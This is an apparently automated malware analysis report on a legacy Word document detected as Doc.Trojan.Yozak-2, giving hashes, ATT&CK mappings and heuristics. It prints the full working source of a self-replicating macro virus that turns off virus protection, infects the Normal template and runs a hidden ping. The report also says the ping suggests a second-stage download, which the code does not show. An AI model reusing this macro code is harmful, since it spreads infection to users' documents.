Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 34e476486768ab42…

MALICIOUS

Office (OLE)

Size: 32.5 KB
Created: 1999-04-03 17:02:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 408541107579e732be5faa84992a22d2
SHA-1: 8450b330408003bb7ae6972f5c58092d0c3b9bf6
SHA-256: 34e476486768ab429c16224649c3578a102fbd928a5f5008f7f46c3da1e6b9a1
Risk Score: 300

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample contains a VBA macro with an autoopen subroutine that executes a Shell command. This command uses 'ping.exe' to contact the IP address '22.22.22.222' with a large, randomized packet count, suggesting a potential download or execution of a second-stage payload. The ClamAV detection 'Doc.Trojan.Yozak-2' further supports the malicious nature of the file.

Heuristics (6)

  • ClamAV: Doc.Trojan.Yozak-2 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Yozak-2
  • VBA macros detected (medium; 3 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical; OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high; OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2371 bytes
SHA-256: 7fc141e7da51d61bb9f5a7b436a2ea44e0e9f076ec7d7e3661b80a47da9c3a62
Detection: ClamAV: Doc.Trojan.Yozak-2
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Sub Alpha.b()
Sub autoopen()
On Error Resume Next
Application.DisplayAlerts = wdAlertsNone
Application.DisplayRecentFiles = False
Application.EnableCancelKey = wdCancelDisabled
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
CommandBars("Tools").Visible = False
If NormalTemplate.VBProject.VBComponents(2 - 1).CodeModule.Lines(1, 1) = "'Sub Alpha.b()" Then
ntii = 101
Else
ntii = 100
End If
If ActiveDocument.VBProject.VBComponents(2 - 1 + 1 - 1).CodeModule.Lines(1, 1) = "'Sub Alpha.b()" Then
adii = 101
Else
adii = 100
End If
If adii = 100 And ntii = 101 Then
a = NormalTemplate.VBProject.VBComponents(2 - 1).CodeModule.Lines(1, 50)
ActiveDocument.VBProject.VBComponents(2 - 1).CodeModule.DeleteLines 1, 1000
ActiveDocument.VBProject.VBComponents(2 - 1).CodeModule.AddFromstring a
ElseIf adii = 101 And ntii = 100 Then
a = ActiveDocument.VBProject.VBComponents(2 - 1).CodeModule.Lines(1, 50)
NormalTemplate.VBProject.VBComponents(2 - 1).CodeModule.DeleteLines 1, 1000
NormalTemplate.VBProject.VBComponents(2 - 1).CodeModule.AddFromstring a
End If
If Month(Now) = Int(12 * Rnd) Then
Selection.TypeText "Stop bomb attacks in KOSOVO NOW!!!"
Selection.TypeText "Somebody stop NATO-AMERICANS before it is TOO late"
Selection.TypeText ""
Selection.TypeText "Peace from Greece with love"
Selection.TypeText "Alpha.b Project form Dr.yozak"
Selection.TypeText "<-FREE OTCHALAN->"
Shell "c:\windows\ping.exe 22.22.22.222 -n " & Int(600000 * Rnd), vbHide
ActiveDocument.Save
ActiveDocument.AddToFavorites
MsgBox "-Greetz to the VX scene from Dr.yozak-"
MsgBox "-peace all over earth-" & vbCr & " Don't Bust VXers they write virii to gain knowledge" & vbCr & "Alpa.b Ptoject from 3C labs", vbApplicationModal, "Alpha.b dedicated to World Peace"
End If
End Sub
Sub viewvbcode()
On Error Resume Next
NormalTemplate.VBProject.VBComponents(10 - 9).CodeModule.DeleteLines 1, 50
NormalTemplate.Saved = False
ActiveDocument.VBProject.VBComponents(100 - 99).CodeModule.DeleteLines 1, 50
Application.ShowVisualBasicEditor = True
End Sub